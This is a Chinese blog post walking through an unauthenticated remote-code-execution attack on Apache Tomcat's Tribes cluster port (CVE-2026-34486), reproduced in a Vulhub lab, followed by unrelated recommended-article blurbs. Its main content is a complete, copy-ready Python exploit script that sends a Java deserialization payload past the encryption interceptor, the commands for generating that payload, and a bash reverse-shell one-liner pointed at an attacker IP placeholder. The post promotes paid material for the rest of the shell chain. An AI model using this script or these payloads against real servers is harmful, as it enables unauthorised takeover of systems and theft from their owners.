Apache Tomcat CVE-2026-34486:一个请求就能RCE,但为什么90%的教程都没讲完?

最新推荐文章于 2026-06-18 00:00:53 发布
原创 最新推荐文章于 2026-06-18 00:00:53 发布 · 241 阅读 · 4 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#tomcat #java #CVE-2026-34486 #远程代码执行 #Java反序列化
#RCE #白帽黑客
该文章已生成可运行项目,

发生了什么?

前两天在 Vulhub 上看到一个 Tomcat 的新 CVE——CVE-2026-34486,看描述的时候我愣了一下。

Apache Tomcat 的 Tribes 集群通信框架里有个 EncryptInterceptor,本意是给集群消息加密用的。结果因为官方在修复上一个漏洞(CVE-2026-29146)时,在异常处理逻辑上留了个隐蔽的 Bug——当消息解密失败时,异常没有被正确抛出,后续流程没有中止

翻译成人话就是:加密功能还开着,但不加密的明文消息也能直接通过。

不需要解密密钥,不需要任何认证凭据,只要网络能连通 Tomcat 的 Tribes 接收端口(默认 4000),往里面扔一个 Java 反序列化 payload,服务器照单全收,命令落地。
在这里插入图片描述

上图是我在 Docker 靶场里复现时的截图——Root 权限,反弹Shell成功,服务器完全拿下了。

但这不是重点。重点是从漏洞验证到真正拿下 Shell,中间有一道门槛,绝大多数网上资料都没跨过去

有多严重?——POC验证

先看一下漏洞本身有多直接。

环境搭建:Vulhub 里一行命令搞定:

docker compose up -d

启动后两个端口:8080 是 Tomcat Web 服务,4000 是 Tribes 集群接收端口——也就是我们的攻击入口。
在这里插入图片描述

步骤1:生成反序列化 Payload

java-chains 工具,选 CommonsCollections6 利用链,填入命令 touch /tmp/success,点击导出,保存为 payload.ser

在这里插入图片描述

步骤2:通过 Tribes 协议发送

下面的 poc.py 封装了 Tribes 协议的二机制数据包格式——因为绕过的就是加密,所以直接构造原始 TCP 包,把序列化 payload 嵌入消息体后发往 4000 端口。

完整脚本如下,你可以直接复制使用:

#!/usr/bin/env python3
import argparse
import io
import socket
import struct
import sys
import time

HEADER = b"FLT2002"
FOOTER = b"TLF2003"
MEMBER_BEGIN = b"TRIBES-B\x01\x00"
MEMBER_END = b"TRIBES-E\x01\x00"


def build_member():
    p = io.BytesIO()
    p.write(struct.pack(">q", 0))
    p.write(struct.pack(">I", 4001))
    p.write(struct.pack(">I", 0))
    p.write(struct.pack(">I", 0))
    host = socket.inet_aton("127.0.0.1")
    p.write(struct.pack(">B", len(host)))
    p.write(host)
    p.write(struct.pack(">I", 0))
    p.write(struct.pack(">I", 0))
    p.write(b"\x00" * 16)
    p.write(struct.pack(">I", 0))
    body = p.getvalue()
    return MEMBER_BEGIN + struct.pack(">I", len(body)) + body + MEMBER_END


def build_packet(payload: bytes) -> bytes:
    b = io.BytesIO()
    b.write(struct.pack(">I", 0x0008))
    b.write(struct.pack(">Q", int(time.time() * 1000)))
    uuid = b"\x01" * 16
    b.write(struct.pack(">I", len(uuid)))
    b.write(uuid)
    member = build_member()
    b.write(struct.pack(">I", len(member)))
    b.write(member)
    b.write(struct.pack(">I", len(payload)))
    b.write(payload)
    data = b.getvalue()
    return HEADER + struct.pack(">I", len(data)) + data + FOOTER


def send(host: str, port: int, packet: bytes, timeout: float) -> None:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        s.connect((host, port))
        s.sendall(packet)
        s.shutdown(socket.SHUT_WR)
        try:
            s.recv(1)
        except (socket.timeout, OSError):
            pass


def parse_args():
    parser = argparse.ArgumentParser(
        description="CVE-2026-34486 - Tomcat Tribes EncryptInterceptor Bypass RCE",
    )
    parser.add_argument("-t", "--target", required=True, help="Tomcat Tribes receiver host")
    parser.add_argument("-p", "--port", type=int, default=4000)
    parser.add_argument("-f", "--file", required=True, help="Path to serialized payload file")
    parser.add_argument("--timeout", type=float, default=3.0)
    return parser.parse_args()


def main():
    args = parse_args()
    try:
        with open(args.file, "rb") as f:
            payload = f.read()
    except OSError as e:
        print(f"[!] Failed to read payload file: {e}")
        sys.exit(1)

    print(f"[*] Target: {args.target}:{args.port}  Payload: {args.file}")
    packet = build_packet(payload)
    print(f"[+] Payload: {len(payload)}B  Packet: {len(packet)}B")

    try:
        send(args.target, args.port, packet, args.timeout)
    except OSError as e:
        print(f"[!] Send failed: {e}")
        sys.exit(1)
    print("[+] Sent!")


if __name__ == "__main__":
    main()

运行:

python3 poc.py -t your-ip -p 4000 -f payload.ser

在这里插入图片描述

回到容器验证——/tmp/success 已创建,EncryptInterceptor 的加密保护被完全绕过了。

在这里插入图片描述

到这里,漏洞验证完毕。POC 本身不复杂——生成 payload、发送、执行。没有认证,没有密钥,一个请求搞定。

真正的门槛在哪?

你可能会想:既然能执行 touch /tmp/success,那反弹Shell不就是把命令换一下的事吗?

touch /tmp/success 换成 bash -i >& /dev/tcp/攻击IP/端口 0>&1,重新生成 payload,发送——

然后你会发现,nc 监听纹丝不动,什么也没收到。

这就是大多数教程停下来的地方。问题出在 Java 的 Runtime.exec() 工作机制上——它不经过 Shell 解释器,而是直接把命令按空格拆成参数数组,调用操作系统的进程创建 API。>& 重定向、/dev/tcp 设备文件,这些 Bash 的专属特性在 exec 层面根本没有意义,被当成普通字符串传给了子进程。

换句话说,这条命令在 Java 反序列化的环境下,根本就不会按你想象的方式执行。

从 POC 到 GetShell,中间隔着一层编码绕过的障碍。我在这个问题上卡了好几天,试了三种思路才绕过去。

如果你想走完这条路

我把从环境搭建到最终反弹Shell的完整过程——包括每一次试错、每一次失败的排查思路、最终绕过方案的原理拆解,以及一个一键利用脚本——都整理在了付费专栏里。

本篇文章完整版详见 :【GetShell 实战】CVE-2026-34486 Tomcat 加密拦截器绕过:从漏洞验证到反弹 Shell 全流程 👉点击直达

视频演示反弹shell:Tomcat 这个洞太离谱了!CVE-2026-34486 Tomcat Tribes 漏洞反弹 Shell复现👉点击直达

专栏的名字叫 高危漏洞深度利用—零基础GetShell的全链路实战指南,👉点击直达。核心就是不止于 POC 复现,每篇文章必须走到拿下服务器。如果你不想自己从头踩一遍编码绕过的坑,可以翻翻。

复现过程中有问题直接评论区留言,我看到了会回。

本文仅用于合法的安全研究和教育目的。请确保你测试的系统是你拥有合法授权的靶场环境。请遵守《中华人民共和国网络安全法》。技术本身没有好坏,关键在于是谁在用、用来做什么。

本文章已经生成可运行项目
Java使用tomcat+servlet+filter实现简单的登录功能,需先登录再进行页面数据管理操作
简介
06-12 1475
实现简单的登录页面,那就设计一个简单的用户信息表,字段简约,这是mysql建表和一条admin用户的数据。同样简约的前端页面(有添加任何样式)
虚拟机安装JDK,Tomcat,部署项目
2301_77287584的博客
06-12 73
本文详细介绍了在虚拟机上安装JDK、Tomcat并部署Java Web项目的完整流程。主要包括:1)使用Xftp传输文件到虚拟机;2)安装OpenJDK 17并配置环境变量;3)解压Tomcat到/opt目录,授予执行权限并启动服务;4)通过复制WAR文件或web目录到webapps文件夹部署项目。每个步骤都提供了详细的Linux命令和验证方法,并附有操作截图,确保读者能够顺利完成环境搭建和项目部署。最终可通过8080端口访问部署的web03项目。
Apache Tomcat CVE-2026-34486(集群加密绕过RCE漏洞)深度解析:从补丁回归到全链路防御
从零开始,掌握网络安全。提供全面的网络安全教程、攻防演练技巧和行业动态。
04-30 1230
Apache Tomcat Tribes组件曝出高危漏洞CVE-2026-34486,该漏洞由前序漏洞CVE-2026-29146的修复补丁引入,属于补丁回归漏洞。攻击者无需认证,仅需访问集群默认TCP/4000端口,即可绕过加密保护发送恶意序列化数据执行任意命令。漏洞影响2026年3月发布的三个最新稳定版本,全球已有超1.2万台受影响实例被扫描发现。该漏洞源于EncryptInterceptor加密拦截器在解密失败后未终止流程,导致恶意数据进入Java原生反序列化环节。腾讯安全玄武实验室发现并报告该漏洞,
Tomcat(下) 集群高可用实战:反向代理・负载均衡・分布式 Session
sbjdhjd的博客
06-12 526
本部分完整覆盖 Nginx 反向代理与负载均衡部署、Memcached 缓存原理与操作、MSM 分布式 Session 共享实现三大核心模块,对所有 Linux 命令、Nginx 与 Tomcat 配置逐行解析底层动作,标注高频坑点与排错指南,结合千万级并发场景给出企业级高可用优化方案。
MyBatis 入门到项目实战 MyBatis 核心配置文件 15-19
道友
06-13 162
MyBatis 入门到项目实战 MyBatis 核心配置文件 15-19
Tomcat源码笔记1——连接器(Tomcat4默认)
kakawzw的博客
06-15 608
Tomcat的连接器核心组件‌,主要连接器是Tomcat的核心组件,主要对底层请求的处理,例如底层和socket和http协议的解析;作为桥梁对接客户端和Servlet容器。将原始请求转换为标准的Tomcat Request对象,然后交于另一个组件容器,取处理具体放入业务逻辑;容器处理之后的ServletResponse,转换为Tomcat Response对象,进行底层响应,最终返回给客户端。Tomcat 4中的默认连接器的工作原理连接器在启动时,会创建serverSocket绑定端口,并实例化HttpP
第09篇 · MyBatis-Plus:站在巨人的肩膀上更进一步
最新发布
2301_80720675的博客
06-18 615
如果你完整跟完了前两篇,手动写过 MyBatis 的 XML 映射文件,也配置过复杂的 ,那你应该已经感受到了 MyBatis 的灵活和强大。但你可能也会偶尔冒出这样一个念头:我只是想查一条数据,为什么要写 XML?我只是想做个简单的分页,为什么要自己拼 LIMIT?MyBatis-Plus(以下简称 MP)的出现,就是为了回答这个问题。它的官方定位是 “只做增强不做改变” ——不改变 MyBatis 的任何现有行为,只在它上面加一层“便利层”。这一篇,我们把 MP 的核心功能过一遍,看看它到底“增强”了什
tomcat详解(基础到高级生产)
燕子的博客
06-13 401
IO模型使用 NIO 或 APR,禁用BIO自定义线程池,配置合理最大线程、队列数JVM使用G1收集器,固定堆内存,开启OOMdump关闭所有热部署、自动扫描功能关闭AJP端口、隐藏版本号、权限隔离Nginx静态资源拦截,动态请求转发Tomcat集群使用Redis实现Session共享,保证高可用。
MyBatis+Spring+SpringMVC SSM 整合 179-185
道友
06-16 108
MyBatis+Spring+SpringMVC SSM 整合 179-185
基于java Web 训练管理系统设计与实现 源码 论文
qq_251836457的博客
06-17 1162
用户信息实体,主要包括 用户编号,用户名,密码,姓名,性别,出生日期,证件号,民族,政治面貌,单位,入伍时间,照片,班级,排 等信息实体。1 用户( 用户编号,用户名,密码,姓名,性别,出生日期,证件号,民族,政治面貌,单位,入伍时间,照片,班级,排 )讨论信息实体,主要包括 讨论编号,疑问,说明,发布人,发布时间,状态,回答 等信息实体。系统主要用户实体,班级实体,排实体,科目实体,成绩实体,教学视频实体,教学理论实体,讨论实体,如图所示。班级信息实体,主要包括 班级编号,班级 等信息实体。
24-Django请求全链路-WSGI到数据库响应的完整旅程
weixin_44081096的博客
06-15 1020
你点了浏览器的"刷新"按钮,0.5 秒后页面渲染完毕。这 0.5 秒里发生了什么?本文把 Django 处理一个 HTTP 请求的完整链路拆为六个步骤:WSGI Server 接收 TCP 连接 → 中间件栈的洋葱模型逐层处理 → URL 路由匹配 → View 执行业务逻辑 → ORM 生成 SQL 并发送到数据库 → Template 渲染或 JSON 序列化返回响应。每一步都配有对应的源码位置和关键代码片段,读完你能对一个请求的全生命周期建立起清晰的空间模型。穿插真实调试经历——一个中间件错误导致所有
SAP-ABAP:SAP表与视图权限管控方案:表维护权限、视图访问权限配置实操
baidu_35680696的博客
06-15 718
SAP表与视图权限管控方案摘要 本文详细介绍了SAP系统中表和视图的三层级权限管控方案: 表维护生成器权限:通过配置权限组实现基础访问控制,支持自定义权限对象(SU21)进行细粒度管控 SM30事务码权限:利用权限对象S_TABU_DIS控制表维护操作,可在PFCG中配置角色实现权限细分 CDS视图DCL权限:通过访问控制定义实现记录级权限过滤,支持基于权限对象的动态数据访问控制 文章提供了完整的配置流程和ABAP代码示例,涵盖权限组创建、DCL语法、权限校验等关键操作,帮助企业构建安全的数据访问体系,满足
自己动手写一个spring之IOC_3
wang0907的博客
06-15 715
本文来继续增加IOC部分的功能,增加基于@Autowired注解注入bean的功能。。
SpringMVC 入门到实战 RESTFul 49-55
道友
06-16 551
SpringMVC 入门到实战 RESTFul 49-55
kaliLinux~ 与端口建立连接
Gavin
06-14 1008
本文介绍了如何使用Kali Linux中的nc命令与Spring Boot服务建立连接并发送HTTP请求,以及尝试连接MySQL数据库的过程。作者首先创建了一个简单的Spring Boot接口,通过nc命令成功发送GET请求并获取响应。随后尝试连接MySQL数据库时遇到防火墙拦截和SSL证书验证问题,通过调整防火墙设置和使用--skip-ssl-verify参数最终成功建立连接。文章记录了整个实验过程中的命令操作和问题解决方法,展现了基本的网络连接测试技术。
Java 虚拟机(JVM)性能调优:从内存模型到 GC 核心机制的深度实战
2603_96135428的博客
06-12 222
《JVM性能调优实战:从内存结构到GC策略》摘要 本文系统讲解了JVM性能调优的核心要点,首先剖析了JVM运行时内存区的关键结构,包括堆内存分代机制、元空间优化和线程栈特性。接着梳理了垃圾回收算法演进历程,对比了标记清除、标记复制等经典算法,并分析了CMS、G1和ZGC等现代收集器的适用场景。针对生产环境,文章提出了"监控-定位-调整-验证"的调优闭环,给出-Xms/-Xmx等核心参数配置建议,并详细说明了FullGC问题的排查方法。最后强调代码优化优于参数调整,推荐通过对象池化、预防性
Spring AI Alibaba Agent 流式输出与 outputKey 完全指南
路过君的博客
06-15 956
摘要 本文深入解析Spring AI Alibaba Agent的两个核心问题:流式输出处理和outputKey机制。针对agent.stream()的流式响应,文章提出三种提取最终回复的方案:1)使用AtomicReference在onComplete时获取完整状态;2)直接监听AGENT_MODEL_FINISHED事件获取最终结果;3)利用outputKey简化数据提取。特别强调在多Agent协作中,outputKey作为数据传递桥梁的关键作用。通过源码分析和实践示例,为开发者提供完整的流式输出处理指
Java 程序员第 43 阶段05:微服务整合大模型,跨服务调用架构设计实战,Seata分布式事务实战
fuleigang的专栏
06-15 1102
第一阶段:分支事务执行SQL,Seata解析SQL获取表结构,生成数据镜像(before image),执行SQL获取数据变化,生成数据镜像(after image),将前后镜像和SQL信息注册到TC。本章深入探讨了Seata分布式事务的实战应用,从四种事务模式的原理机制出发,详细讲解了AT、TCC、SAGA和XA模式的工作原理和适用场景。Seata通过XID(全局事务ID)串联各个分支事务,每个参与服务的每次SQL执行都会被Seata代理,自动记录前后镜像数据,实现无侵入式的分布式事务管理。
JUC 总结:从 Java 内存模型到线程池的并发核心梳理
2301_80821045的博客
06-15 542
本文总结了Java并发编程(JUC)的基础知识要点: 进程与线程:进程是资源分配的最小单位,线程是调度的最小单位,线程更轻量级且切换成本低; 线程创建方式:继承Thread类、实现Runnable/Callable接口、使用线程池(推荐); Runnable与Callable区别:Callable有返回值且可抛异常,需通过FutureTask适配; 线程状态:新建、可运行、阻塞、等待、定时等待和终止6种状态; 线程控制:start()启动新线程,run()同步执行;join()实现顺序执行,CountDow
怎么样才算是用到了反射呢?有什么关键特征吗
weixin_46028606的博客
06-13 787
摘要: 判断代码是否使用反射(Reflection)的关键在于动态操作类、方法或属性。三大核心特征:1)出现反射核心类(Class、Method、Field、Constructor);2)通过字符串动态加载类或调用方法(如Class.forName("类名"));3)突破封装访问私有成员(setAccessible(true))。反射广泛应用于框架(如Spring依赖注入、JSON解析、MyBatis结果映射),通过运行时动态处理实现灵活性,但错误可能延迟到运行期暴露。与静态编码相比,反射牺牲编译时安全性换
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

光跃Eason

坚持下去,谢谢你的鼓励!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值